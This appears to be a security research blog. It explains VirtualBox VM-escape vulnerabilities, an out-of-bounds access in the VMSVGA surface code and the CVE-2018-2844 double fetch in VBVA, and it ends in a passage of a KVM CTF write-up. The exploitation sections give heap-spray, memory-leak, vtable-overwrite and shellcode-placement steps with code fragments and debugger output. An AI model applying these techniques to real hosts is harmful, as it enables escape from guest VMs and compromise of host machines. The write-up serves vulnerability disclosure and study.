Bugs in vmsvga3dSurfaceDefine() allows setting very large values for pMipmapLevel->size.width, pMipmapLevel->size.height and pMipmapLevel->size.depth but still end up allocating only the desired size heap chunks. This is very useful for further exploiting the integer overflows in vmsvga3dSurfaceDMA().

int vmsvga3dSurfaceDMA(PVGASTATE pThis, SVGA3dGuestImage guest, SVGA3dSurfaceImageId host, SVGA3dTransferType transfer,
                       uint32_t cCopyBoxes, SVGA3dCopyBox *paBoxes)
{
. . .
        for (unsigned i = 0; i < cCopyBoxes; i++)    
        {
            . . .  
            /* Apparently we're supposed to clip it (gmr test sample) */
            if (paBoxes[i].x + paBoxes[i].w > pMipLevel->size.width)
                paBoxes[i].w = pMipLevel->size.width - paBoxes[i].x;
            if (paBoxes[i].y + paBoxes[i].h > pMipLevel->size.height)
                paBoxes[i].h = pMipLevel->size.height - paBoxes[i].y;
            if (paBoxes[i].z + paBoxes[i].d > pMipLevel->size.depth)
                paBoxes[i].d = pMipLevel->size.depth - paBoxes[i].z;

            if (    !paBoxes[i].w
                ||  !paBoxes[i].h
                ||  !paBoxes[i].d
                ||   paBoxes[i].x > pMipLevel->size.width
                ||   paBoxes[i].y > pMipLevel->size.height
                ||   paBoxes[i].z > pMipLevel->size.depth)
            {
                . . .
                continue;
            }
. . .
            uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);
. . .
            rc = vmsvgaGMRTransfer(pThis,
                                   transfer,
. . .
                                   paBoxes[i].w * pSurface->cbBlock,
                                   paBoxes[i].d * paBoxes[i].h);
. . .
}
The first set of checks involving paBoxes can be bypassed since, pMipLevel width, height and depth are set to very large values in vmsvga3dSurfaceDefine(). Later these values are used for calculating the ‘uDestOffset’, which could be set to arbitrary value.

uDestOffset = paBoxes[i].x * pSurface->cbBlock + paBoxes[i].y * pMipLevel->cbSurfacePitch + paBoxes[i].z * pMipLevel->size.height * pMipLevel->cbSurfacePitch;
However, there is a validation following this:
            AssertReturn(uDestOffset + paBoxes[i].w * pSurface->cbBlock * paBoxes[i].h * paBoxes[i].d <= pMipLevel->cbSurface, VERR_INTERNAL_ERROR);

i.e. uDestOffset + ((paBoxes[i].w * pSurface->cbBlock) * (paBoxes[i].h * paBoxes[i].d)) <= pMipLevel->cbSurface
Here one can set high values to either uDestOffset or (paBoxes[i].w * pSurface->cbBlock) or (paBoxes[i].h * paBoxes[i].d) to bypass the validation. In vmsvgaGMRTransfer(), (paBoxes[i].w * pSurface->cbBlock) and (paBoxes[i].h * paBoxes[i].d) are used in computing size arguments for memcpy() call. To keep sizes to sane values, let’s set uDestOffset to a large value, thus allowing read/write at an offset ~4GB from a surface allocation.

There are 2 things which needs to be solved in order to exploit this bug:
- Allocate the memory at offset ~4GB from a surface allocation
- The memory allocated at this huge offset should have interesting pointers to corrupt which could lead to code execution

In OSX, there are three types of allocations – tiny, small and large. For more details on the allocator refer the previous work [9] and [10]. Tiny and small heap allocations falls at an address range of 0x00007fxxxxx00000, whereas large allocations occupies another address range 0x00000001xxxxx000. Either of this heap allocation can be targeted to exploit this bug.

My choice was to target the tiny and small heap allocations. This is primarily because I was aware of tiny allocations holding pointers to vtable and other memory allocations, which could be corrupted for code execution. However, spraying the entire 4GB memory with tiny allocations is a very slow process. OSX supports small allocations up to the size of 127KB. So the idea is to allocate as much as small chunks as possible to speed up the heap spray and smaller amount of heap spray with tiny chunks.

Allocating tiny chunks:

For tiny chunks I targeted the allocations performed by HGCM (Host-Guest Communication Manager). Good amount of details about HGCM can be found in [11]. For this exploit, I used to HGCM connection objects for spraying. HGCM connections are initialized using the VMM virtual PCI device. The BAR0 of the device holds the I/O port address used for HGCM communication. Whenever an HGCM connection is initiated, a HGCMClient object of size 72 bytes is allocated in memory and client ID is returned. This is what the HGCMClient object looks like:

typedef struct _AVLULNodeCore
{
    AVLULKEY                Key;        /** Key value. */
    struct _AVLULNodeCore  *pLeft;      /** Pointer to left leaf node. */
    struct _AVLULNodeCore  *pRight;     /** Pointer to right leaf node. */
    unsigned char           uchHeight;  /** Height of this tree: max(height(left), height(right)) + 1 */
} AVLULNODECORE, *PAVLULNODECORE, **PPAVLULNODECORE;

typedef struct _ObjectAVLCore
{
    AVLULNODECORE AvlCore;
    void *pSelf;                        // type HGCMObject
} ObjectAVLCore;

struct HGCMClient {
        void *vptr_HGCMObject;
        uint32_t m_cRefs;
        uint32_t m_enmObjType;          // HGCMOBJ_TYPE enum
        ObjectAVLCore m_core;
        void *pService;                 // type HGCMService
        void *pvData;
        uint64_t padding;
} HGCMClient;
Creation and allocations of HGCMClient are done by HGCMService::CreateAndConnectClient in src/VBox/Main/src-client/HGCM.cpp. The client objects are maintained using a AVL tree. The nodes have client ID’s as key and also holds a pointer to object itself. During exploitation, we avoid corrupting the AVL tree metadata to prevent any crashes during lookup or insertion of AVL tree nodes. Further, the vtable of HGCMClient can be corrupted for gaining RIP control.

The deletion of HGCMClient objects happens during HGCM disconnect, which is handled by HGCMService::DisconnectClient where the corrupted vtable gets used.

int HGCMService::DisconnectClient(uint32_t u32ClientId, bool fFromService)
{
. . .
            HGCMMsgSvcDisconnect *pMsg = (HGCMMsgSvcDisconnect *)hgcmObjReference(hMsg, HGCMOBJ_MSG);
            AssertRelease(pMsg);

            pMsg->u32ClientId = u32ClientId;

            hgcmObjDereference(pMsg);  // use of corrupted vtable on deletion
. . .
}

Allocating small chunks:

In order to fill 4GB, small chunks are much faster option compared to tiny chunks. SVGA_3D_CMD_SURFACE_DEFINE command can be used to allocate chunks of arbitrary size.

int vmsvga3dSurfaceDefine(PVGASTATE pThis, uint32_t sid, uint32_t surfaceFlags, SVGA3dSurfaceFormat format,
                          SVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], uint32_t multisampleCount,
                          SVGA3dTextureFilter autogenFilter, uint32_t cMipLevels, SVGA3dSize *paMipLevelSizes)
{
. . .
    AssertReturn(sid < SVGA3D_MAX_SURFACE_IDS, VERR_INVALID_PARAMETER);
. . .
    pSurface = pState->papSurfaces[sid];

    /* If one already exists with this id, then destroy it now. */
    if (pSurface->id != SVGA3D_INVALID_ID)
        vmsvga3dSurfaceDestroy(pThis, sid);
. . .
}
vmsvga3dSurfaceDefine() allows a maximum of SVGA3D_MAX_SURFACE_IDS (32 * 1024) unique surface allocations. With surfaces of size 127KB, this is a good enough limit to fill ~4GB of memory. Since the pages were allocated towards the lower addresses of heap, initially the HGCMClient objects are allocated followed by the surface allocations. This is what the memory layout looks like after the heap spray:
Memory layout before spray:


Stack                  00007000060c1000-0000700006143000           thread 29
MALLOC_TINY            00007ff16b400000-00007ff16b500000 [ 1024K   684K   684K   316K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b500000-00007ff16b700000 [ 2048K   792K   792K  1256K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b700000-00007ff16b800000 [ 1024K   840K   840K   184K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16b800000-00007ff16c06d000 [ 8628K  1332K  1332K  2160K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16c06d000-00007ff16c06e000 [    4K     4K     4K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16c06e000-00007ff16d800000 [ 23.6M  2600K  2600K  4288K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d800000-00007ff16d900000 [ 1024K   484K   484K   540K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d900000-00007ff16da00000 [ 1024K   364K   364K   660K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16da00000-00007ff16dc00000 [ 2048K    20K    20K    12K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff16dc00000-00007ff16de00000 [ 2048K    20K    20K    24K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff16de00000-00007ff16df00000 [ 1024K     8K     8K     8K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff16df00000-00007ff16e000000 [ 1024K   448K   448K   492K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16e000000-00007ff16e800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_SMALL           00007ff16e800000-00007ff16f000000 [ 8192K     8K     8K   240K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL (empty)   00007ff16f000000-00007ff170000000 [ 16.0M     8K     8K   172K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff170000000-00007ff170100000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170100000-00007ff170200000 [ 1024K   368K   368K    60K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY (empty)    00007ff170200000-00007ff170300000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170300000-00007ff170400000 [ 1024K     4K     4K    20K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff170400000-00007ff170600000 [ 2048K    84K    84K   948K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff170800000-00007ff171000000 [ 8192K     4K     4K    96K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL           00007ff171000000-00007ff171800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
STACK GUARD            00007ffee50b0000-00007ffee88b0000 [ 56.0M     0K     0K     0K] ---/rwx SM=NUL          stack guard for thread 0

Memory layout after spray:


Stack                  000070000624a000-00007000062cc000 [  520K    12K    12K     0K] rw-/rwx SM=PRV          thread 35
MALLOC_SMALL           00007ff06b800000-00007ff079800000 [224.0M 209.3M 209.3M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff07b800000-00007ff08b000000 [248.0M 243.4M 243.4M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff08b400000-00007ff08b500000 [ 1024K   244K   244K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff08b800000-00007ff0c2800000 [880.0M 863.7M 863.7M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0c2800000-00007ff0c3000000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0c3000000-00007ff0ec800000 [664.0M 532.9M 532.9M 118.8M] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0ec800000-00007ff0ed000000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0ed000000-00007ff0fb000000 [224.0M 217.3M 217.3M  2588K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff0fb400000-00007ff0fb500000 [ 1024K   184K   184K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff0fb800000-00007ff12b000000 [760.0M 745.9M 745.9M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff12b400000-00007ff12b500000 [ 1024K   936K   936K     4K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff12b800000-00007ff139000000 [216.0M 212.0M 212.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff139000000-00007ff139800000 [ 8192K  8032K  8032K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff139800000-00007ff13b000000 [ 24.0M  23.6M  23.6M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff13b400000-00007ff13b500000 [ 1024K  1016K  1016K     8K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff13b800000-00007ff16b000000 [760.0M 745.9M 745.9M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16b400000-00007ff16b800000 [ 4096K  2464K  2464K  1632K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16b800000-00007ff16c06d000 [ 8628K  6592K  6592K  1828K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16c06d000-00007ff16c06e000 [    4K     4K     4K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16c06e000-00007ff16d000000 [ 15.6M  14.0M  14.0M  1440K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff16d000000-00007ff16d800000 [ 8192K  5608K  5608K  2312K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16d800000-00007ff16da00000 [ 2048K   864K   864K  1184K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff16da00000-00007ff16dc00000 [ 2048K    24K    24K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff16dc00000-00007ff16de00000 [ 2048K    20K    20K    24K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff16de00000-00007ff16df00000 [ 1024K     8K     8K     8K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff16df00000-00007ff16e000000 [ 1024K   940K   940K    84K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL (empty)   00007ff16e000000-00007ff16e800000 [ 8192K     4K     4K     8K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_SMALL           00007ff16e800000-00007ff16f000000 [ 8192K     8K     8K   240K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL (empty)   00007ff16f000000-00007ff170000000 [ 16.0M     8K     8K   172K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY (empty)    00007ff170000000-00007ff170100000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170100000-00007ff170200000 [ 1024K   988K   988K    36K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY (empty)    00007ff170200000-00007ff170300000 [ 1024K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff170300000-00007ff170400000 [ 1024K     4K     4K    20K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_TINY            00007ff170400000-00007ff170500000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff170500000-00007ff170800000 [ 3072K  3072K  3072K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff170800000-00007ff171000000 [ 8192K     4K     4K    96K] rw-/rwx SM=COW          GFXMallocZone_0x107072000
MALLOC_SMALL           00007ff171000000-00007ff171800000 [ 8192K     8K     8K     4K] rw-/rwx SM=COW          QuartzCore_0x10cc46000
MALLOC_TINY            00007ff171800000-00007ff172a00000 [ 18.0M  18.0M  18.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff172a00000-00007ff172b00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff172b00000-00007ff173800000 [ 13.0M  13.0M  13.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff173800000-00007ff173900000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff173900000-00007ff174800000 [ 15.0M  15.0M  15.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174800000-00007ff174900000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174900000-00007ff174b00000 [ 2048K  2048K  2048K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174b00000-00007ff174c00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff174c00000-00007ff175000000 [ 4096K  4096K  4096K     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175000000-00007ff175100000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175100000-00007ff175b00000 [ 10.0M  10.0M  10.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175b00000-00007ff175c00000 [ 1024K  1024K  1024K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff175c00000-00007ff176600000 [ 10.0M  10.0M  10.0M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
MALLOC_TINY            00007ff176600000-00007ff176900000 [ 3072K  2352K  2352K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x106b7d000
MALLOC_SMALL           00007ff177000000-00007ff17b000000 [ 64.0M  62.8M  62.8M     0K] rw-/rwx SM=COW          DefaultMallocZone_0x106b7d000
STACK GUARD            00007ffee50b0000-00007ffee88b0000 [ 56.0M     0K     0K     0K] ---/rwx SM=NUL          stack guard for thread 0

Locating and overwriting HGCMClient Object:

Once heap spray is done, use the out of bound read to leak memory relative to the surfaces starting from SVGA3D_MAX_SURFACE_IDS – 1. If any HGCMClient is found, stop the search, else keep going.
/* leak memory */
        for (int i = SVGA3D_MAX_SURFACE_IDS - 1; i >= 0; i--) {
                access_memory(i, SVGA3D_READ_HOST_VRAM, memory, 0x1000);
                rv = find_hgcm_client(memory, 0x1000, &details);
                if (rv == 0) {
                        surface_id = i;
                        break;
                }
        }
Once the client object is found, we know the location of the object by leaking its ‘pSelf’ pointer. The object’s vtable is a pointer to VBoxC.dylib. Both of this can be used to break ASLR. Later corrupt the object using the out of bound write relative to the surface id found during the search.
        access_memory(surface_id, SVGA3D_WRITE_HOST_VRAM, memory, 0x1000);
Finally, use HGCM disconnect to use the corrupted HGCMClient as below:
        warnx("[+] Triggering payload...");
        disconnect_client(details.key);

Environment:

Guest: Ubuntu Server 16.04.5 64-bit with single vCPU and VMSVGA enabled
Host: MacOS High Sierra 10.13.6. Note that MacOS Mojave does not support older versions of VirtualBox
VirtualBox: Version 5.1.22 r115126

Exploit took around 3 minutes to complete due to the heap spray involved. The proof-of-concept exploit code and other code can be found at virtualbox-vmsvga-bugs



References and further readings:

[1] GPU Virtualization on VMware’s Hosted I/O Architecture
[2] VMware SVGA Device Interface and Programming Model
[3] CLOUDBURST - A VMware Guest to Host Escape Story
[4] Attacking hypervisors through hardware emulation
[5] VBoxManage
[6] Oracle Critical Patch Update Advisory - January 2015
[7] Oracle Critical Patch Update Advisory - July 2017
[8] Oracle Critical Patch Update Advisory - October 2017
[9] Heapple Pie - The macOS/iOS default heap
[10] In the Zone: OS X Heap Exploitation
[11] Thinking outside the VirtualBox

Tuesday, August 28, 2018

From Compiler Optimization to Code Execution - VirtualBox VM Escape - CVE-2018-2844

Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
sudo lspci -vvv

00:02.0 VGA compatible controller: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter (prog-if 00 [VGA controller])
 ...
 Interrupt: pin A routed to IRQ 10
 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=16M]
 Expansion ROM at  [disabled]
 Kernel modules: vboxvideo
The guest sets up command buffer using HGSMI as below and writes the offset in VRAM to IO port VGA_PORT_HGSMI_GUEST (0x3d0) to notify the host.
 HGSMIBUFFERHEADER header; 
 uint8_t data[header.u32BufferSize]; 
 HGSMIBUFFERTAIL tail;
The bug specifically occurs in code handling Video DMA (VDMA) commands passed from Guest to Host. The VDMA command handling function vboxVDMACmdExec() dispatches to specific functions based on VDMA command types. This is implemented as switch case statements.
static int
vboxVDMACmdExec(PVBOXVDMAHOST pVdma, const uint8_t *pvBuffer, uint32_t cbBuffer)
{
 /* pvBuffer is shared memory in VRAM */
        PVBOXVDMACMD pCmd = (PVBOXVDMACMD)pvBuffer;

        switch (pCmd->enmType) {
                case VBOXVDMACMD_TYPE_CHROMIUM_CMD: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_PRESENT_BLT: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_NOP: {
                        ...
                }
                case VBOXVDMACMD_TYPE_CHILD_STATUS_IRQ: {
                        ...
                }
                default: {
                         ...
                }
        }
}
The compiler optimizes the switch cases to jump tables. This is what it looks like after optimization:
; first fetch happens for cmp
.text:00000000000B957A                 cmp     dword ptr [r12], 0Ah ; switch 11 cases
.text:00000000000B957F                 ja      VBOXVDMACMD_TYPE_DEFAULT ; jumptable 00000000000B9597 default case

; second fetch again for pCmd->enmType from shared memory
.text:00000000000B9585                 mov     eax, [r12]
.text:00000000000B9589                 lea     rbx, vboxVDMACmdExec_JMPS
.text:00000000000B9590                 movsxd  rax, dword ptr [rbx+rax*4]
.text:00000000000B9594                 add     rax, rbx
.text:00000000000B9597                 jmp     rax             ; switch jump
.rodata:0000000000185538 vboxVDMACmdExec_JMPS dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                                         ; DATA XREF: vboxVDMACommand+1D9o
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_PRESENT_BLT - 185538h ; jump table for switch statement
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185564                 align 20h
The issue is quite clear, its a TOCTOU bug. Since the variable is not marked volatile, GCC optimizations resulted in double fetch from shared VRAM memory. I didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected.

Note that this kind of issue is not new. We have prior research Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm on similar issue found in Xen

Exploitation:

Though the race window is really small, it can be reliably won on guests having more than one vCPU.
 RAX  0xdeadbeef
 RBX  0x7fff8abf2538 ◂— rol    byte ptr [rdx - 0xd], 1
 RCX  0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RDX  0xe7b
 RDI  0xeeb
 RSI  0x7fffdc022000 ◂— xor    byte ptr [rax], al /* 0xffe40030; '0' */
 R8   0x7fff89d20000 ◂— jmp    0x7fff89d20010 /* 0xb020000000eeb */
 R9   0x7fff8ab06040 ◂— push   rbp
 R10  0x7fff9c50ad48 ◂— 0x1 
 R11  0x7fff9c508d48 ◂— 0x0
 R12  0x7fff89d20078 ◂— 0xa /* '\n' */ 
 R13  0xf3b
 R14  0x7fff9c50d0e0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 R15  0x7fff89d20030 ◂— 0xffffffdc0f3b0eeb
 RBP  0x7fffba44dc40 —▸ 0x7fffba44dca0 —▸ 0x7fffba44dce0 —▸ 0x7fffba44dd00 —▸ 0x7fffba44dd50 ◂— ...
 RSP  0x7fffba44db80 —▸ 0x7fffba44dbb0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RIP  0x7fff8ab26590 ◂— movsxd rax, dword ptr [rbx + rax*4]


 ► 0x7fff8ab26590    movsxd rax, dword ptr [rbx + rax*4]
   0x7fff8ab26594    add    rax, rbx
   0x7fff8ab26597    jmp    rax
RAX is controlled by guest. R8, R12 and R15 points to offsets within HGSMI buffer during the crash. The jump table uses relative addressing, hence once cannot directly call into a pointer. First plan was to find a feature, which allows to write a controlled value in VBoxDD.so from guest and further use it as fake jump table. However, I failed to find one.

Next option is to directly jump to the VRAM buffer mapped with RWX permissions using whatever value available for fake jump table.
    // VRAM buffer
    0x7fff88d21000     0x7fff89d21000 rwxp  1000000 0

    
    // VBoxDD.so
    0x7fff8aa6d000     0x7fff8adff000 r-xp   392000 0      /usr/lib/virtualbox/VBoxDD.so
    0x7fff8adff000     0x7fff8afff000 ---p   200000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8afff000     0x7fff8b010000 r--p    11000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8b010000     0x7fff8b018000 rw-p     8000 3a3000 /usr/lib/virtualbox/VBoxDD.so
Find a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative.

In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server 16.04.3 64-bit as guest and Ubuntu Desktop 16.04.4 64-bit as host running VirtualBox 5.2.6.r120293.

The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844



References:

[1] Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm
[2] SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities by Niklas Baumstark
[3] VM escape - QEMU Case Study by Mehdi Talbi & Paul Fariello
[4] Xen Security Advisory CVE-2015-8550 / XSA-155
[5] Oracle Critical Patch Update Advisory - April 2018

Saturday, August 11, 2018

Real World CTF - kid_vm

kid_vm is a KVM API based challenge. The provided user space binary uses KVM ioctl calls to setup guest and execute guest code in 16-bit real mode. The binary comes with following mitigations
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
The guest code is copied to a page allocated using mmap. KVM_SET_USER_MEMORY_REGION call then sets up guest memory with guest physical starting at address 0 and backing memory pointing to the mmap’ed page
       
        guest_memory = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (!guest_memory) {
                perror("Mmap fail");
                return 1;
        }

        /* copy guest code */
        memcpy(guest_memory, guest, sizeof(guest));

        region.slot = 0;
        region.guest_phys_addr = 0;
        region.memory_size = 0x10000;
        region.userspace_addr = (uint64_t) guest_memory;

        if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region) == -1) {
The guest code also sets KVM_GUESTDBG_SINGLESTEP which causes VM exit (KVM_EXIT_DEBUG) on each step. KVM does doesn't seem to notify userspace code on VM exit caused by vmcall. Single stepping looks like a work around to detect vmcall instruction.
        memset(&debug, 0, sizeof(debug));
        debug.control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP;

        if (ioctl(vcpu, KVM_SET_GUEST_DEBUG, &debug) < 0) {
                perror("Fail");
                return 1;
        }
The next interesting part of code is the user space VM exit handler
    switch (run->exit_reason) {

        case KVM_EXIT_IO:
            if (run->io.direction == KVM_EXIT_IO_OUT && run->io.size == 1
                         && run->io.port == 23 && run->ex.error_code == 1) {

                putchar(*((char *)run + run->io.data_offset));
                continue;
            }

            if (run->io.direction == KVM_EXIT_IO_IN && run->io.size == 1
                            && run->io.port == 23 && run->ex.error_code == 1) {

                read(0, ((char *)run + run->io.data_offset), 1);
                continue;
            }

            fwrite("Unhandled IO\n", 1, 0xD, stderr);
            return 1;

        case KVM_EXIT_DEBUG:
            if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                puts("Error get regs!");

            /* check if VMCALL instruction */
            if (guest_memory[regs.rip] == 0xF && guest_memory[regs.rip + 1] == 1
                                        && guest_memory[regs.rip + 2] == 0xC1) {

